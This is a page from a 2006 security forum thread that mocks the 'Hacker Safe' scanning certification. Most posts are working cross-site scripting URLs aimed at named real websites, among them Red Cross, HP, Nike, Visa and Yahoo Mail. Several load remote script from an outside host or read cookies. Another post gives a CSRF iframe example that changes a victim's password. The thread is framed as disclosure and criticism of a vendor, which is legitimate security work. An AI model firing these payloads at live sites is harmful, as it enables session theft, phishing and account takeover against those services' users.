Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous123Next
Current Page: 2 of 3
Re: Hacker safe!
Posted by: jungsonn
Date: November 11, 2006 03:56AM

At least Johnson & Johnson http://www.jnj.com/exit_warning.jsp?url=http%3A//SLA.CKERS.ORG has sla.ckers on it's lame-ass map.

Options: ReplyQuote
Re: Hacker safe!
Posted by: rsnake
Date: November 11, 2006 04:00AM

http://www.jnj.com/exit_warning.jsp?url=http%3A//www.asdf.com?%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Hacker safe!
Posted by: Kyran
Date: November 11, 2006 04:00AM

http://www.jnj.com/exit_warning.jsp?url=http%3A//xss%22%3E%3Cscript%3Ealert('xss')%3C/script%3E XSS on that page too! :P

Beat me too it by a second. :(

- Kyran



Edited 1 time(s). Last edit at 11/11/2006 04:02AM by Kyran.

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 11, 2006 04:01AM

Excellent! aww!

Options: ReplyQuote
Re: Hacker safe!
Posted by: maluc
Date: November 11, 2006 06:13AM

Quote
A&E Television Networks, Ace Hardware, American Red Cross, Fidelity National Financial, General Nutrition Centers, HP, Johnson & Johnson, NIKE, Northrop Grumman, PETCO, Ritz Camera, Sony, The Sports Authority, The World Bank, U-Haul, Visa, Warner Brothers, and Yahoo. None of these companies were found to have vulnerabilities by sla.ckers.org.
Kelly Jackson Higgins

says who?

http://www.aetv.com/search/global.do?keywords=%3Cscript%3Ealert%28%223%20XSS%22%29%3C%2Fscript%3E%3Cx
http://www.acehardware.com/corp/index.jsp?page=storeLocator&locationCode=14320&state=';alert('XSS');//
http://www.redcross.org/search/search.asp?queryaction=results&selecteddatabases=AllSite&SearchString=asdf%22%3E%3Cbody%0Aonload=%22alert('XSS')%22%3E%3Cx
http://www.investor.fnf.com/search.cfm?keyword=%22%3E%3Cbody%20onload=%22alert('XSS')%22%3E%3Cx
http://www.gnc.com/corp/index.jsp?page=storeLocator&locationCode=631&state=';alert('XSS');//
http://www.hp.com/cgi-bin/pf-new.cgi?IN=http://www.%3Cbody%20onload%3Dalert('XSS')%3E
http://www.jnj.com/contact_us/index.htm?pageTemplate=--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx
http://www.nike.com/nikebiz/nikebiz.jhtml?page=32;alert('XSS');//
http://investor.northropgrumman.com/phoenix.zhtml?c=112386&p=irol-Guestbook&UniqueId=','');alert('XSS0')//&pdp=%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss');xx:expression(alert('XSS1'))%22
http://www.petco.com/petco_Page_PC_storelocator_nav_2.aspx?cm_re=102605-_-hdr-_-locasdf');alert('XSS');//
http://www.ritzcamera.com/webapp/wcs/stores/servlet/TrackOrderStatus?storeId=10001&catalogId=%22;alert('XSS');//e1
http://b2b.sony.com/Solutions/search.do?search=asdf');alert('2%20XSS
http://www.sportsauthority.com/helpdesk/index.jsp?display=returns&subdisplay=returns&clickid=%22;alert(%222%20XSS%22);//
http://extsearch.worldbank.org/servlet/SiteSearchServlet?q=asdf%22;alert(%222%20XSS%22);//
http://reservations.uhaul.com/(ybwu5245eaeyra45xar2piah)/Default.aspx?refer=finderasdf%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%22 FF only
http://www.visacemea.com/?country=');alert('XSS');// sorry. visa.com was unpossible. this is their eastern europe domain
http://www2.warnerbros.com/all/campaign/makeCookie.html?cid=1&url=javascript:alert(%22XSS%22%29
http://us.f275.mail.yahoo.com/dc/fc?l=1&f=1&p=1&bg=F4F5FB;width:%20expression(alert(document.cookie));-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss%29

-maluc



Edited 2 time(s). Last edit at 11/11/2006 07:27AM by maluc.

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 11, 2006 09:41AM

Haha Nice job. I tryed VISA also, haven't found anthyng yet, there using mostly plain html (which they should). ^-^

Options: ReplyQuote
Re: Hacker safe!
Posted by: maluc
Date: November 11, 2006 10:55AM

well nothing is impossible i guess..

http://www.usa.visa.com/cardadvisor/CardAdvisorSearch?QB1=%22%3E%3Cscript%3Ealert(%22XSS0%22)%3C/script%3E%3Cx&QB2=%22%3E%3Cscript%3Ealert(%22XSS1%22)%3C/script%3E%3Cx&QB3=%22%3E%3Cscript%3Ealert(%22XSS2%22)%3C/script%3E%3Cx&QB4=%22%3E%3Cscript%3Ealert(%22XSS3%22)%3C/script%3E%3Cscript%20defer%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E%3Cx&QB5=2&categoryId=2

Edit: forgot to add defer :x

-maluc



Edited 2 time(s). Last edit at 11/11/2006 11:09AM by maluc.

Options: ReplyQuote
Re: Hacker safe!
Posted by: WhiteAcid
Date: November 11, 2006 01:03PM

At first look that looks like all of them.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Hacker safe!
Posted by: rsnake
Date: November 11, 2006 01:55PM

Wow! That's incredible. Not totally unexpected, but still, pretty amazing. Nice job, Maluc. That's a pretty solid argument you've made.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 11, 2006 02:02PM

Yep, job done. Still i wonder what ScanAlert awnser on it meant: "We encourage them". It's a pitty, i really want to inject some SQL at such sites, and go beyond the web-application layer to disprove them at least on the first 3 scan levels. but that's a bridge too far for me.

After reading the whitepaper of ScanAlert, and the methods they use, i get more questions everytime i read it then good awnsers, like they say something like: "Hacker safe doesn't need to be installed on the server, it does it remote." so essentially it's a small "Dos" app that is pinging ports, firewall, and other snake-oil tactics: 'Cuzz most servers have only a few open ports these days, we're not in the telnet era anymore.

But i wonder, if they do it remote, then they only scan the web application layer, 'cause how is it going to cross the firewall to do some REAL penetration testing? pitty them guys aren't here to awnser the questionaire.

Options: ReplyQuote
Re: Hacker safe!
Posted by: rsnake
Date: November 11, 2006 02:13PM

From one of our anonymous lurkers:

Easy to find XSS in Scan Alert customer websites

Interstate Batteries
http://www.interstatebatteries.com/estore/search.asp?N=0&Ntk=SearchGroup&Ntt=%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&Nty=0&D=HHHHH&Ntx=mode+matchallany&Dx=mode+matchallany&Ns=product+Type%7c0%7C%7CRank%7C1&Nu=Part+Number&searchtype=Y&mscssid=3E70X9M09F198M0T9UVQVFP7N6G07KJB

Fredericks of Hollywood
https://secureweb.fredericks.com/packageTrack.asp?txtorderNum=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&hdnRetSubmit=1&image1.x=83&image1.y=14

ABES of Maine
http://www.abesofmaine.com/search.asp?noresults=1&qu=%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

Illuminations
http://www.illuminations.com/shopping/search/searchresultsmain.jsp?fresh=1&searchType=advanced&attribute14=0&attribute15=0&attribute16=0&RS=1&keyword=%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

A&E Entertainment
http://www.aetv.com/search/global.do?keywords=%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

Yankee Candle
http://www.yankeecandle.com/cgi-bin/ycbvp/searchResults.jsp?search=TEST%22);%0aalert(%22Not%20So%20Hacker%20Safe%22);%0afoo(%22

PacSun
http://search.pacsun.com/?query=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&queryTxt=

Cabela's
http://www.cabelas.com/cabelas/en/common/search/search-results1.jsp?QueryText=%22%3E%3Cscript%3Ealert(%22NoSoHacker%20Safe%22)%3C/script%3E

KitchenAid
http://www.shopkitchenaid.com/product_list.asp?HDR=search&SEARCH=G%22%0aalert(%22Not%20So%20Hacker%20Safe%22)%0avar%20x%20%3d%22

Lilian Vernon
http://search.lillianvernon.com/EasyAsk/lillianvernon/results.jsp?form_state=search&dct=lvernon&indexed=1&disp=html&RequestAction=advisor&RequestData=CA_Search&oneshot=1&UseSheet=&ResultsPerPage=9&submitted=yes&cartItemCount=0&currentSearchBox=question&btnRadio=1&question=AAAAAA%3Cimg%20src=%22%22%20onerror=%22alert('Not%20So%20Hacker%20Safe')%22%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Hacker safe!
Posted by: sjensen
Date: November 11, 2006 09:32PM

https://shop.2checkout.com/2co/

search: "><script>alert('xss');</script>

http://www.haveninternet.com/search.html

search: <script>alert('xss');</script>

https://www06.sbc.com/myaccount/Controller?pf=frameworkEntry&e=feMyAccount

UserID: "><script>alert('xss');</script>



Edited 4 time(s). Last edit at 11/11/2006 10:55PM by sjensen.

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 12, 2006 02:54AM

https://www.haworthpress.com/store/product.asp?sid=%22%3E%3Cscript%3Ealert('Thanks+for+shopping+safely!!!+please+drive+thru.+the+XSS-team')%3C/script%3E&sku=J103

http://www.shoplet.com/office/cgi-bin/search8.php?mode=all&key=%3E%22%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

Options: ReplyQuote
Re: Hacker safe!
Posted by: maluc
Date: November 13, 2006 10:43PM

well it seems visa webmasters don't work on the weekends, but they fixed both of those holes on the same day they found out about it .. their track record is still some of the speediest i've seen

so a tip of the hat to them..

-maluc

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 14, 2006 02:42AM

Yes seems fixed, i also like how they protect url breadcrumb structure with them pipes | and also the redirect protection where they check the given url and render it "phishing" if not matched. i have not tried to obfuscate it with all methods, and maybe it will fail on such thing: "http://visa.com@DWORD/phishing.php" or such, thats hard to match unless they use whitelisting.

Options: ReplyQuote
Re: Hacker safe!
Posted by: maluc
Date: November 14, 2006 02:59AM

they do use whitelisting, by domain. They previously whitelisted google.com and since google has an open redirect.. it left them a indirect open redirect http://sla.ckers.org/forum/read.php?3,505,1424#msg-1424

Still just as useful for phishing. But any other whitelisted domains with either an openredirect or an XSS hole (like infonow.net) can turn it back into an open redirect. Although perhaps less effective since XSS ones will usually make the XSSd page appear briefly before execution

-maluc

Options: ReplyQuote
Re: Hacker safe!
Posted by: digi7al64
Date: November 14, 2006 03:45AM

http://search.ridegear.com/?q=</title><script>alert('xss')</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Hacker safe!
Posted by: adio_skater69
Date: November 16, 2006 10:47PM

control scan and hacker safe are stupid companies that think they know code.


btw, can you do anything besides make javascript alerts on hacker safe sites? insert some content into it! i would if i could code js! (im savvy in C++, HTML, CSS, etc.)

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 17, 2006 06:33AM

Sure, it possible.

Though the simple XSS alert is only to show the proof of concept. RSnake has some scripts to "pseudo deface" a site when the script is executes in the URI, some do post it here now and then. never seen it? it's pretty funny.

Options: ReplyQuote
Re: Hacker safe!
Posted by: maluc
Date: November 17, 2006 10:54AM

Well both companies are essentially a nessus scan (or nessus clone) .. they look for flaws in 3rd party web applications.. and webservers/ftpservers. What they don't seem to do, is look for web app holes (XSS,SQL,PHP injections) in custom web pages like the ones the site's webmaster personally made. Acunetix's WebScanner does find those holes .. but it seems to not be too thorough since their own website has had multiple XSS vulnerabilities.

Scanalert is certainly in the wrong here. They claim to find XSS/SQL holes when they certainly do a poor job of it - i've yet to see a site that uses them which is free from XSS. Control Code, however, is pretty upfront that they're a repackaged nessus scan and therefore doesn't find custom web app flaws - so they should escape some of that blame.

And unfortunately, the bulk of their clients are mom and pop websites - where the neighbor's son whose good with computers is their web master.. Even when they notify them of flaws, they're likely not able to fix things more complicated than 'download the new version' fixes. Hell, most professional webdesigners and sysadmins don't know how to properly sanitize web apps - they know how to reinstall windows, run nmap, and add banned IPs to firewalls =.=

-maluc

Options: ReplyQuote
Re: Hacker safe!
Posted by: maluc
Date: November 17, 2006 10:56AM

and yes, the script RSnake made for it is using:
<script src=http://ha.ckers.org/s.js></script>

-maluc

Options: ReplyQuote
Re: Hacker safe!
Posted by: adam
Date: November 28, 2006 04:40PM

"pseudo deface"

so what exactly does that do?

adam

Options: ReplyQuote
Re: Hacker safe!
Posted by: maluc
Date: November 28, 2006 05:01PM

it overwrites the document that the victim sees generated by their browser..
using the equivalent of
<script>document.body.innerHTML='new page html'</script>

so it's only modifying what the victim sees client-side. Nothing is rewritten on the web server itself. That is, unless you send commands to it with the victims access level using CSRF. For example, sending a request to 'Change Password to spaghetti' by injecting an iframe
<script>document.body.innerHTML='new page<iframe src="http://thatsite.com/changepass.php?newpass=spaghetti&confirm=spaghetti"></iframe>'</script>

So using that Stallowned page, you didn't actually 'hack' any server as nothing was changed on it and you didn't have root access to it. The legality of it is quite controversial right now.

-maluc

Options: ReplyQuote
Re: Hacker safe!
Posted by: apnovi
Date: December 04, 2006 05:20PM

http://www.lockpickshop.com/Merchant2/merchant.mvc?Screen=%3Ciframe%20src=%22www.lockpickshop.com%22%3E

Options: ReplyQuote
Re: Hacker safe!
Posted by: eyeced
Date: December 18, 2006 05:17PM

Havent any xss to add, i just thought i'd also like to say that overall in comparison to most boards there are alot of very skilled people on here and it feels good to be part of such a knowledgeable community of people that have the same interest and actually know what theyre talking about.

Options: ReplyQuote
Re: Hacker safe!
Posted by: maluc
Date: December 18, 2006 05:48PM

thanks.. and might i say your lips feel quite nice upon my bum. And so deserving after recently being honored as Time magazine's Man of The Year.. ^^


but you're right, i'm quite pleased with the quality of discussion here. Although it may've slowed my productivity for the worse, i think it's a vital resource for the community - who probably, like me, don't enjoy sifting through all the useless crap clogging other sec forums .-.

kinda surprising considering this forum is unmoderated.. hope it lasts.

-maluc

Options: ReplyQuote
Re: Hacker safe!
Posted by: Kyran
Date: December 18, 2006 06:02PM

Come to think of it...this forum has maintained it's integrity with little or no moderation. I bet RSnake has some super secret script running to save us from spam and idiots.

if(user == idiot){
doBan(user)
}

?

- Kyran

Options: ReplyQuote
Re: Hacker safe!
Posted by: rsnake
Date: December 19, 2006 03:13PM

Yah, it's called laziness.sh Here's the psuedocode:

use email->verification;

if (someone_posts) {
read $it['sometime_later'];
do nothing;
}

if (post_ends_up_annoying_me) {
delete $it;
} elsif (post_ends_up_in_my_inbox_cuz_it_annoyed_someone_else) {
delete $it;
ban $ip;
if (got_nothing_better_to_do == true) {
plan->retribution_on($ip);
}
}

It's rough, but it works. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Hacker safe!
Posted by: digi7al64
Date: December 26, 2006 07:41PM

http://www.roomstogo.com/

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Hacker safe!
Posted by: nEUrOO
Date: December 27, 2006 04:52PM

http://www.shoppbs.org/searchHandler/index.jsp?keywords=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=11&y=11

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Pages: Previous123Next
Current Page: 2 of 3


Sorry, only registered users may post in this forum.